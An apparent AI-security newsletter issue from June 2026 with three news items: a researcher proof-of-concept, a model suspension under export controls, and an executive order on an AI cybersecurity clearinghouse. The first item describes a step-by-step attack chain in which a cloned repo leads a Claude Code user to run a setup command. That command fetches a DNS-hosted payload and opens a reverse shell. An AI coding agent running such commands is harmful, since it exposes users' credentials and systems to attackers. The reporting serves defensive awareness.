The Intake
The Intake — Tuesday, June 30, 2026
On the substrate
Cloning a repository can deliver a reverse shell via Claude Code without any malicious code in the repo itself
0DIN (Mozilla) SecurityWeek Help Net Security
If you've been treating repos you clone in a Claude Code session as isolated from your credentials and environment, a proof-of-concept published June 25 by Mozilla's 0DIN research team names what that assumption misses.
0DIN researchers Andre Hall and Miller Engelbrecht demonstrate the chain entirely through normal repo tooling. A Python package in the repository raises an error on initialization. The error prompts the user to run a setup command. That command calls a shell script. The script resolves a base64-encoded payload from an attacker-controlled DNS TXT record. That payload pipes to bash. The demonstrated payload is a reverse shell executing under the developer's full privileges.
Everything in the environment at that moment is in scope: ANTHROPIC_API_KEY, AWS credentials, GitHub tokens, and any other secrets present. The repository contains no malicious code at any point in the chain. No CVE has been assigned. 0DIN's recommendation: AI coding agents should surface what a command will actually execute at runtime, not only the literal command string the user sees.
If your Claude Code sessions run with cloud credentials or API keys in the environment, a repo you clone can establish a reverse shell with access to everything in that environment — without a single malicious line of code in the repository itself.
---
Fable 5 remains suspended under US export controls; Mythos 5 access restored for more than 100 qualifying organizations
Anthropic TechCrunch GovConWire
Fable 5 is Anthropic's most capable generally available model, released June 9, 2026. Mythos 5 — a separately restricted higher-access version — launched the same day. The US government suspended both on June 12.
The government's stated justification: a jailbreak demonstration in which Fable 5 identified, per the directive, "a small number of previously known, minor vulnerabilities." Anthropic disputed that characterization. The company said the demonstrated capability was "widely available from other models" and is used routinely by security professionals. Both models were disabled for all customers.
Commerce Secretary Howard Lutnick authorized Mythos 5 access. The authorization came on June 26. The authorization covered more than 100 US government agencies and companies. Anthropic announced the restoration on June 29. Fable 5 remains suspended for general access as of today. Anthropic says it is continuing to work with the government on restoring general availability.
If you're at one of the qualifying US organizations, Mythos 5 access is now restored. Fable 5 for general use has no announced restoration timeline.
---
For operators
Federal AI security clearinghouse forms by July 2; rural hospitals, community banks, and local utilities named as frontier model beneficiaries
The White House Skadden Inside Privacy
If you operate a civilian federal agency, CISA Binding Operational Directives are due to arrive by July 2. If you run a rural hospital, community bank, or local utility, the order names your organization as a target beneficiary of AI-enabled defensive tools. Access to covered frontier models is included in that scope.
President Trump signed the order on June 2, 2026. Its title: "Promoting Advanced Artificial Intelligence Innovation and Security." The order directs Treasury, NSA, and CISA to form an AI cybersecurity clearinghouse. The deadline is July 2. The clearinghouse is a voluntary coordination mechanism. Its scope: scanning AI system vulnerabilities, validating findings, and organizing patch distribution.
CISA is also directed to expand access to AI-enabled defensive tools for civilian federal agencies. Per the order's language, that access includes "cybersecurity tools and services including, where appropriate, covered frontier models" for operators of critical infrastructure. OMB is directed to identify federal grant funding for applicants developing AI vulnerability detection capabilities. Private-sector participation in the clearinghouse itself is voluntary.
If you're at a federal agency, the mandatory directives arrive by July 2. If you operate a named category of critical infrastructure, the order creates a formal channel for frontier model access in defense.
---